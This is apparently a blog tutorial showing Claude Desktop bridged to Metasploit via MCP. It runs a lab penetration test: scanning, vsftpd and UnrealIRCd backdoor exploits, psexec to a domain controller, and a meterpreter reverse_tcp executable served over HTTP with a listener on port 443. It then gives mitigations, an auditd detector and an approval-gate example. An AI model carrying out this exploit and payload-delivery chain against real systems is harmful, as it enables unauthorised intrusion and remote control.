
Introduction:
The Model Context Protocol (MCP) is fundamentally reshaping how security professionals interact with offensive tooling, transforming the Metasploit Framework from a command-line arsenal into a conversational adversary. By connecting Claude Desktop to Metasploit through an MCP bridge, operators can now issue plain-English objectives—such as “scan 192.168.1.8” or “exploit port 21”—and watch as the assistant interprets, plans, and executes the corresponding actions, collapsing the friction that traditionally slows engagements. This article documents an end-to-end agentic penetration test where an AI assistant, connected to Metasploit, scans a network, selects and launches exploit modules, manages sessions, runs post-exploitation, and even builds and delivers a custom payload—first compromising a vulnerable Linux host and then pivoting to a Windows Domain Controller. Because these techniques grant real control over real systems, they must only ever run against assets you are explicitly authorised to test.
Learning Objectives:
- Objective 1: Build and configure the Metasploit MCP bridge to connect Claude Desktop with the Metasploit Framework’s RPC interface.
- Objective 2: Execute a complete agentic penetration testing workflow—from reconnaissance and vulnerability identification to exploitation, post-exploitation, and payload generation—using only natural-language commands.
- Objective 3: Analyse the security implications, limitations, and defensive strategies associated with AI-driven offensive tooling, including mitigation techniques against the specific vulnerabilities exploited.
You Should Know:
- Building the Metasploit MCP Bridge: Connecting AI to Offensive Infrastructure
Before any offensive action can be taken, the assistant must be connected to Metasploit. The bridge exposes Metasploit’s RPC interface as MCP tools—such as run_exploit, run_post_module, and list_active_sessions—making them callable through natural language.
Step‑by‑step guide explaining what this does and how to use it:
Step 1: Install the Metasploit MCP Server
The bridge itself must first be installed on the Kali attacker machine.
sudo apt install metasploitmcp
This installs the package that translates between MCP and Metasploit’s RPC.
Step 2: Start PostgreSQL and the MSF RPC Daemon
Metasploit relies on PostgreSQL for its database, and the MCP bridge communicates through the `msfrpcd` daemon.
sudo service postgresql start
msfrpcd -P <your_password> -S -a 127.0.0.1 -p 55553
– -P: Sets the password for RPC authentication.
– -S: Disables SSL for local communication (use caution in production).
– -a 127.0.0.1: Binds the service to localhost only.
– -p 55553: Specifies the listening port.
Step 3: Add the Claude Desktop Repository Key
Claude Desktop is installed via APT, requiring the repository signing key.
curl -fsSL https://pkg.claude-desktop-debian.dev/KEY.gpg | sudo gpg --dearmor -o /usr/share/keyrings/claude-desktop.gpg
This imports the key so APT can verify the package’s authenticity.
Step 4: Register the Repository and Refresh APT
The repository is registered against the keyring, and the package index is updated.
echo "deb [signed-by=/usr/share/keyrings/claude-desktop.gpg arch=amd64,arm64] https://pkg.claude-desktop-debian.dev stable main" | sudo tee /etc/apt/sources.list.d/claude-desktop.list
sudo apt update
This makes the Claude Desktop package available for installation.
Step 5: Install Claude Desktop
The client is then installed, providing the interface and the local MCP server manager.
sudo apt install claude-desktop
Launch the client after installation.
Step 6: Locate the MCP Configuration File
In Claude Desktop, open Settings, navigate to the Developer tab, and access Local MCP servers. Click Edit Config to open the JSON configuration file.
~/.config/Claude/claude_desktop_config.json
This file initially holds client preferences and will be edited to register the Metasploit server.
Step 7: Register the Metasploit Server
Edit the configuration file to include the `mcpServers` block. The `command` is metasploitmcp, the `transport` is stdio, and `MSF_PASSWORD` must match the password given to msfrpcd.
{
  "mcpServers": {
    "metasploit": {
      "command": "metasploitmcp",
      "args": [ "--transport", "stdio" ],
      "env": {
        "MSF_PASSWORD": "YourPasswordHere"
      }
    }
  }
}
After saving, the Local MCP servers panel in Settings should list Metasploit with a green running badge, confirming the bridge is live.
- Scenario 1: Compromising the Linux Target with Natural Language
With the bridge live, the assistant is turned on the Metasploitable 2 host at 192.168.1.8, moving from reconnaissance to a root shell using only plain-language tasks. This demonstrates the core power of agentic tooling: the assistant interprets terse instructions, recalls exact module syntax, chains steps, and reports results in context.
Step‑by‑step guide explaining what this does and how to use it:
Step 1: Tasking Claude to Scan the Target
A deliberately terse task is issued—no flags, no module names. The assistant must work out the method itself.
scan 192.168.1.8
Claude reasons about its constraints, proposes alternatives, runs a scan through the connector, and returns the first open ports: FTP, SSH, Telnet, SMTP, HTTP, SMB, MySQL, and VNC.
Step 2: Requesting a Complete Port Map
When asked for a full scan, the assistant returns all 31 open ports and annotates them with security context—flagging vsftpd 2.3.4, the Samba `usermap_script` weakness, `distccd` RCE, the `ingreslock` backdoor, and an UnrealIRCd backdoor.
complete port scan
This demonstrates the assistant’s ability to not only enumerate but also intelligently interpret results.
Step 3: Exploiting the vsftpd Backdoor
The assistant maps the request to the module unix/ftp/vsftpd_234_backdoor, sets RHOSTS, and requests run_exploit. A permission gate halts execution until a human explicitly approves.
exploit port 21
On approval, the backdoor triggers and a Meterpreter session opens as `root` on metasploitable.localdomain.
Step 4: Listing Active Sessions
The foothold is confirmed using the `list_active_sessions` tool.
list_active_sessions
The tool reports one live `root` Meterpreter session, ready for post-exploitation.
Step 5: Post-Exploitation—Enumerating SMB Shares
Claude runs an SMB auxiliary module, correctly recognising `smb_enumshares` as an auxiliary rather than a post module, and returns the share list—including a world-writable `tmp` share—while noting Samba 3.0.20 is vulnerable to `usermap_script` (CVE-2007-2447).
run_post_module scanner/smb/smb_enumshares
This illustrates the assistant’s understanding of module types and its ability to provide contextual risk analysis.
Step 6: Chaining a Second Exploit—UnrealIRCd
Directed at another flagged service, the assistant launches `unix/irc/unreal_ircd_3281_backdoor` and creates a second session—demonstrating multi-exploit chaining.
run exploit on port 6667
The assistant candidly notes a session-persistence quirk in the RPC layer, showcasing transparent fallback and reasoning.
Step 7: Consolidating the Foothold
The two existing footholds on the Linux host are confirmed: a root Meterpreter session via vsftpd and a command shell via UnrealIRCd—a stable base from which to pivot.
list_active_sessions
This confirms the sessions are active and ready for lateral movement.
- Scenario 2: Pivoting to the Windows Domain Controller
With the Linux host owned, the focus shifts to the prize of the lab—the Windows Domain Controller at 192.168.1.11—driving the assistant from reconnaissance to a standing SYSTEM session.
Step‑by‑step guide explaining what this does and how to use it:
Step 1: Scanning the Domain Controller
Pointed at 192.168.1.11, the assistant returns the open ports and classifies them: Kerberos (88, 464), LDAP (389, 636), SMB (445), DNS (53), and RPC—the classic signature of a Windows Domain Controller.
port scan 192.168.1.11
Step 2: Surveying SMB Exploits
Asked for SMB exploits on port 445, the assistant lists EternalBlue, MS08-067, SMBGhost, and others, flagging credential-based `windows/smb/psexec` as the cleanest path—because valid administrator credentials are already held for this lab.
list_exploits windows port 445
This highlights the assistant’s ability to recommend context-appropriate modules.
Step 3: Supplying the Target and Credentials
The assistant gathers parameters interactively rather than guessing. It first asks for `RHOSTS` (the Domain Controller at 192.168.1.11) and then requests SMB credentials.
RHOSTS → 192.168.1.11
SMBUser: administrator
SMBPass: <password>
Because `psexec` authenticates rather than exploiting a memory bug, it needs a valid account.
Step 4: Gaining a SYSTEM Session
The assistant runs psexec, and a session opens—a `windows/meterpreter/reverse_tcp` payload on the Domain Controller. Running `sysinfo` confirms the privilege level:
sysinfo
The result is `NT AUTHORITY\SYSTEM` on a machine named DC—the highest privilege on the host.
Step 5: Surveying Post-Exploitation Modules
The assistant is asked which post modules are worth running. It groups the most useful Windows modules by purpose: gather/recon (hashdump, enum_shares, credential_collector), privilege escalation, and persistence.
list post module
This demonstrates the assistant’s ability to provide structured, actionable intelligence.
Step 6: Enumerating Domain Controller Shares
A post module is run to enumerate shares. When a post module needs a session that has since dropped, the assistant explains the timeout and offers the exact console sequence to re-establish it—a transparent fallback that keeps the operator in control.
run post/windows/gather/enum_shares
An SMB share enumeration returns ADMIN$, C$, IPC$, and the tell-tale `NETLOGON` and SYSVOL—confirming a standard, clean Domain Controller.
- Scenario 3: Generating and Delivering a Custom Payload
Beyond live exploitation, the assistant can build a standalone payload, demonstrating a complete end-to-end capability from reconnaissance to persistent access.
Step‑by‑step guide explaining what this does and how to use it:
Step 1: Invoke Payload Generation
The `generate_payload` tool is invoked, and `windows/meterpreter/reverse_tcp` is selected as the payload type.
generate_payload
The assistant prompts for the output format: exe, ps1, dll, or raw. A standalone Windows executable is chosen.
Step 2: Setting Listener Parameters
A reverse payload must know where to call back. The assistant prompts for `LHOST` and LPORT.
LHOST → 192.168.1.17
LPORT → 443
Port 443 is chosen because it blends with HTTPS and is rarely blocked outbound.
Step 3: Generating the Payload
The assistant produces the executable and reports the result: a 7,168-byte file under `/home/kali/payloads/` with the embedded `LHOST` and LPORT, and a reminder to start a listener first.
Step 4: Hosting the Payload
To deliver the file, a terminal is used to confirm the executable and serve it over HTTP.
cd payloads
ls -al
python3 -m http.server
The log line shows the Domain Controller at `192.168.1.11` downloading it.
Step 5: Starting the Handler
Back in the assistant, the matching listener is started with start_listener. Claude requests the action—specifying the payload, lhost, and lport 443—and the permission gate again requires explicit approval.
start_listener
Step 6: Confirming the Session
When the delivered executable runs, it calls back and a fresh Meterpreter session appears—from `192.168.1.11` as IGNITE\administrator @ DC, over the `192.168.1.17:443` listener.
list_active_sessions
The full chain, from scan to standing access, was driven entirely by conversation.
- Mitigation Strategies: Breaking the Attack Chain
Every weakness exploited in this engagement is well understood and entirely defensible. The following strategies break the chain at multiple points, preventing an attacker from reproducing the outcome.
Step‑by‑step guide explaining what this does and how to use it:
1. Patch and Retire Legacy Services
Software like vsftpd 2.3.4, UnrealIRCd, and `Samba 3.0.x` is long past end-of-life and should be patched or retired outright; any service that isn’t actively needed should be removed entirely.
On Linux: check for and remove unnecessary services
sudo systemctl stop vsftpd
sudo apt-get remove --purge vsftpd
Backing this up with continuous vulnerability management ensures known-bad versions are caught as they reappear.
2. Reduce Attack Surface through Network Segmentation and Firewalling
A single compromised machine must not be able to freely reach everything else. Apply strict ingress and egress firewall rules and close every port that doesn’t serve a documented, justified purpose.
On Linux: use iptables to restrict inbound traffic
sudo iptables -A INPUT -p tcp --dport 21 -j DROP    # block FTP
sudo iptables -A INPUT -p tcp --dport 6667 -j DROP  # block IRC
On Windows: use New-NetFirewallRule to block ports
New-NetFirewallRule -DisplayName "Block Port 445" -Direction Inbound -LocalPort 445 -Protocol TCP -Action Block
On a domain controller, SMB on 445 is a justified service for domain members (SYSVOL and NETLOGON are served over it), so a rule like this should be scoped with -RemoteAddress to the subnets that legitimately need it rather than dropping all inbound 445.
3. Strengthen Identity and Credential Hygiene
The most damaging step was credential-based lateral movement via psexec. Enforce strong, unique passwords and adopt a tiered-administration model so high-privilege credentials are never exposed on lower-trust systems. Deploy LAPS to manage local administrator passwords and restrict which accounts are permitted to authenticate to domain controllers.
Enforce password policy via Group Policy: set minimum password length, complexity, and age.
4. Secure SMB and File Shares
Require SMB signing, disable the obsolete SMBv1 protocol, remove world-writable shares, and apply least privilege to all share permissions.
Disable SMBv1
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Require SMB signing
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
5. Disrupt Payload Delivery and Reverse Shells
Endpoint detection and response with behavioural analytics, application allow-listing, and blocking of unsigned binaries all raise the cost of execution. Alert on anomalous outbound connections, including traffic riding on port 443, where malicious call-backs often hide in plain sight.
On Linux: use auditd to record outbound connect() calls, tagged with a key for later searching
sudo auditctl -a always,exit -F arch=b64 -S connect -k outbound_443
Note that auditd cannot filter connect() by destination port, because the socket address is passed by pointer rather than as a syscall argument value. This rule therefore records every connect() made by 64-bit binaries (32-bit callers need a matching arch=b32 rule), and the port must be read from the accompanying SOCKADDR record afterwards, for example with ausearch -k outbound_443 -i.
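Because the auditd rule above records every connect() and cannot select port 443 itself, the port filtering has to happen on the recorded SOCKADDR data. The following is an added example written for this article, not code from the original page, from auditd, or from Metasploit: it groups raw audit records by event id, decodes the hex-encoded sockaddr_in, and flags connections to port 443 whose destination is not a sanctioned HTTPS egress point. The log lines are constructed samples in auditd's raw format; the process names, the proxy address 10.0.0.1 and the allowlist are assumptions.

```python
"""Decode auditd SOCKADDR records and flag connect() calls to port 443.

Added example; not code from the article, auditd, or Metasploit. The
auditctl rule tags every connect() with the key outbound_443 but cannot
filter by destination port, so the port check is done here, afterwards,
on the recorded sockaddr. The sample log, the process names and the
allowlist of sanctioned HTTPS destinations are constructed assumptions.
"""
import ipaddress
import re
import struct
from collections import defaultdict

# Constructed sample: each event is a SYSCALL record plus a SOCKADDR record
# sharing the audit(timestamp:serial) id. saddr is the raw sockaddr_in in hex:
# sa_family (host order, 0x0002 = AF_INET), port (network order), IPv4 address,
# then 8 bytes of padding. 0x01BB is 443 and 0x0050 is 80.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.100:101): arch=c000003e syscall=42 success=yes exit=0 pid=2001 uid=1000 comm="firefox" exe="/usr/lib/firefox/firefox" key="outbound_443"
type=SOCKADDR msg=audit(1700000000.100:101): saddr=020001BB0A0000010000000000000000
type=SYSCALL msg=audit(1700000000.200:102): arch=c000003e syscall=42 success=yes exit=0 pid=2002 uid=1000 comm="update.exe" exe="/tmp/update.exe" key="outbound_443"
type=SOCKADDR msg=audit(1700000000.200:102): saddr=020001BBC0A801110000000000000000
type=SYSCALL msg=audit(1700000000.300:103): arch=c000003e syscall=42 success=yes exit=0 pid=2003 uid=1000 comm="curl" exe="/usr/bin/curl" key="outbound_443"
type=SOCKADDR msg=audit(1700000000.300:103): saddr=02000050C0A801110000000000000000
"""

# Assumption: 10.0.0.1 is the corporate proxy, the only sanctioned HTTPS egress.
# Anything else dialled on 443 deserves a look, since call-backs hide there.
ALLOWED_443_DESTINATIONS = {"10.0.0.1"}

AUDIT_ID = re.compile(r"msg=audit\(([\d.]+:\d+)\)")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_records(log_text):
    """Group raw audit records by event id: {event_id: {record_type: {field: value}}}."""
    events = defaultdict(dict)
    for line in log_text.splitlines():
        match = AUDIT_ID.search(line)
        if not match:
            continue
        fields = {key: value.strip('"') for key, value in FIELD.findall(line)}
        events[match.group(1)][fields["type"]] = fields
    return events


def decode_sockaddr(hex_saddr):
    """Return (ip, port) for an AF_INET saddr; None for other address families."""
    raw = bytes.fromhex(hex_saddr)
    # sa_family is stored in host byte order (little-endian on x86-64);
    # only AF_INET (2) is decoded here, AF_INET6 (10) has a different layout.
    if len(raw) < 8 or struct.unpack("<H", raw[:2])[0] != 2:
        return None
    port = struct.unpack("!H", raw[2:4])[0]   # sin_port is in network byte order
    return str(ipaddress.IPv4Address(raw[4:8])), port


def flag_outbound(log_text, watch_port=443, allowed=ALLOWED_443_DESTINATIONS):
    """List connect() events to watch_port whose destination is not an allowed host."""
    findings = []
    for event_id, records in parse_records(log_text).items():
        syscall, sockaddr = records.get("SYSCALL"), records.get("SOCKADDR")
        if not syscall or not sockaddr:
            continue
        decoded = decode_sockaddr(sockaddr["saddr"])
        if decoded is None:
            continue
        dest_ip, dest_port = decoded
        if dest_port == watch_port and dest_ip not in allowed:
            findings.append({"event": event_id, "pid": syscall["pid"],
                             "exe": syscall["exe"], "dest": f"{dest_ip}:{dest_port}"})
    return findings


if __name__ == "__main__":
    for finding in flag_outbound(SAMPLE_LOG):
        print(f"ALERT {finding['exe']} (pid {finding['pid']}) -> {finding['dest']} [{finding['event']}]")
```

On the constructed sample only the connection from /tmp/update.exe to 192.168.1.17:443 is reported: the browser's 443 connection goes to the sanctioned proxy and curl's connection is to port 80. In practice the input would be the output of `ausearch -k outbound_443 --raw`, and the allowlist would come from the egress policy.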
6. Keep a Human in the Loop for Agentic Tooling
Defensively, organisations should keep a human in the loop as an approval gate rather than letting an agent act autonomously, log and audit every MCP tool call, and restrict which connectors are enabled. Agent output should be treated as untrusted by default. The same automation that powers offensive testing can be turned toward the blue team to drive detection engineering and continuous validation.
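The controls described above (an approval gate, an audit record of every tool call, a restricted set of connectors, and agent output treated as untrusted) can be expressed as a small policy layer that sits between the client and the bridge. What follows is an added example written for this article, not code from the original page or from the Metasploit MCP bridge. Tool names follow the article; the authorised scope, the one-shot approval flow, the default-deny for unknown tools and the JSON-lines log format are assumptions.

```python
"""Scope-enforcing approval gate and audit trail for MCP tool calls.

Added example; not code from the article or from the Metasploit MCP bridge.
Every proposed call is logged as a JSON line, tools that change target state
or stand up infrastructure wait for a recorded human approval, targets outside
the authorised scope are refused regardless of approval, and any tool name the
policy does not know is denied, so agent output is never trusted by default.
The scope, approval flow and log format are assumptions.
"""
import ipaddress
import json
import time

# Read-only tools may run unattended; gated tools need an operator approval.
READ_ONLY_TOOLS = {"list_active_sessions", "list_exploits", "list_post_modules"}
GATED_TOOLS = {"run_exploit", "run_post_module", "start_listener", "generate_payload"}


class ToolGate:
    """Policy wrapper an MCP client would consult before forwarding a call."""

    def __init__(self, authorised_scope, audit_log):
        self.scope = [ipaddress.ip_network(net) for net in authorised_scope]
        self.audit_log = audit_log   # a list (for tests) or a file-like object
        self.approvals = set()       # one-shot (tool, target) approvals granted by a human

    def approve(self, tool, target, approver):
        """Record a human approval for exactly one run of tool against target."""
        self.approvals.add((tool, target))
        self._record("approval", tool, target, approver=approver)

    def check(self, tool, target=None, args=None):
        """Decide one proposed call: 'allow', 'pending' (awaiting approval) or 'deny'."""
        decision = self._decide(tool, target)
        self._record("decision", tool, target, decision=decision, args=args or {})
        return decision

    def _decide(self, tool, target):
        if tool in READ_ONLY_TOOLS:
            return "allow"
        if tool not in GATED_TOOLS:
            return "deny"                       # unknown tool: default deny
        if target is not None and not self._in_scope(target):
            return "deny"                       # out of scope: no approval can override
        if (tool, target) not in self.approvals:
            return "pending"                    # wait for a human
        self.approvals.discard((tool, target))  # approval is consumed, not reusable
        return "allow"

    def _in_scope(self, target):
        try:
            address = ipaddress.ip_address(target)
        except ValueError:
            return False                        # hostnames are not resolved here; treat as unknown
        return any(address in net for net in self.scope)

    def _record(self, event, tool, target, **extra):
        entry = {"ts": time.time(), "event": event, "tool": tool, "target": target, **extra}
        line = json.dumps(entry, sort_keys=True)
        if hasattr(self.audit_log, "write"):
            self.audit_log.write(line + "\n")
        else:
            self.audit_log.append(line)


def demo():
    """Walk the article's first steps through the gate; returns the decisions and log."""
    log = []
    gate = ToolGate(["192.168.1.0/24"], log)   # assumption: the lab subnet is the authorised scope
    decisions = [
        gate.check("list_active_sessions"),
        gate.check("run_exploit", "192.168.1.8", {"module": "unix/ftp/vsftpd_234_backdoor"}),
    ]
    gate.approve("run_exploit", "192.168.1.8", approver="operator")
    decisions += [
        gate.check("run_exploit", "192.168.1.8", {"module": "unix/ftp/vsftpd_234_backdoor"}),
        gate.check("run_exploit", "192.168.1.8"),   # second run without a fresh approval
        gate.check("run_exploit", "10.9.9.9"),      # outside the authorised scope
        gate.check("drop_database"),                # not a known tool
    ]
    return decisions, log


if __name__ == "__main__":
    decisions, log = demo()
    print(decisions)
    print("\n".join(log))
```

The demo walks the article's opening steps through the gate: the session listing runs unattended, the first exploit request waits for an approval, the same request runs once the approval is recorded and then goes back to pending, and calls against an out-of-scope address or an unknown tool are refused outright. The audit log holds one line per approval and per decision, which is the record a blue team needs to reconstruct what an agent asked for, what a human allowed, and when.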
What Undercode Say:
- Key Takeaway 1: Agentic AI tooling compresses an entire penetration testing engagement into a conversation, drastically lowering the skill floor for offensive operations while simultaneously providing defenders with powerful automation capabilities.
- Key Takeaway 2: The MCP bridge between Claude Desktop and Metasploit is a paradigm shift—it transforms a complex, command-line-driven framework into an intuitive, natural-language-powered adversary that can scan, exploit, pivot, and generate payloads with minimal human intervention.
Analysis:
The demonstration showcases that AI is not merely a passive copilot but an active agent capable of orchestrating complex attack chains. The assistant’s ability to interpret terse commands, recall exact module syntax, and chain multiple exploits—from `vsftpd` backdoor to UnrealIRCd to psexec—illustrates a level of operational fluency that rivals experienced human operators. However, the permission gate remains critical; every offensive step requires explicit human approval, ensuring accountability and preventing autonomous malicious activity. The assistant’s transparent fallback mechanisms—such as explaining session timeouts and offering reconnection sequences—further reinforce that this is a collaborative tool, not a replacement for human judgment. The most profound insight is that the same integration can be inverted for defence: automated detection engineering, continuous validation, and reporting can all benefit from the same agentic capabilities. The advantage will go to whoever adopts it more deliberately, with a human firmly in the loop.
Prediction:
+1 The integration of AI with offensive security tooling like Metasploit will accelerate the democratisation of penetration testing, enabling smaller security teams to conduct sophisticated assessments that were previously resource-prohibitive.
+1 Agentic AI will become a standard component of red team operations within 2–3 years, with custom MCP servers developed for every major security framework, from Cobalt Strike to BloodHound.
-1 The lowered skill floor for offensive operations will inevitably be exploited by malicious actors, leading to a surge in AI-driven automated attacks that will outpace traditional signature-based detection.
-1 Organisations that fail to adopt defensive AI—using the same agentic capabilities for detection engineering and continuous validation—will face a widening capability gap against adversaries who do.
+1 The permission-gate model, requiring human approval for every offensive action, will become the industry standard for AI-assisted security tools, ensuring accountability and preventing autonomous malicious activity.
-1 Legacy systems and unpatched vulnerabilities will become even more attractive targets as AI agents can rapidly identify and chain exploits, increasing the urgency for comprehensive patch management.
+1 The same MCP-based integration will revolutionise defensive operations, with AI agents autonomously validating security controls, generating detection rules, and performing continuous compliance checks.
-1 The reliance on natural-language interfaces may introduce new attack surfaces, such as prompt injection attacks that could manipulate AI assistants into executing unintended actions, necessitating robust input sanitisation and context isolation.
+1 AI-powered penetration testing will shift the industry focus from “how” to exploit to “what” to exploit, with human operators spending more time on strategic decision-making and less on rote command execution.
+1 The convergence of AI and offensive security will ultimately strengthen the overall security posture, as defenders can leverage the same automation to identify and remediate vulnerabilities faster than ever before.
Reported By: Yashika Dhir – Hackers Feeds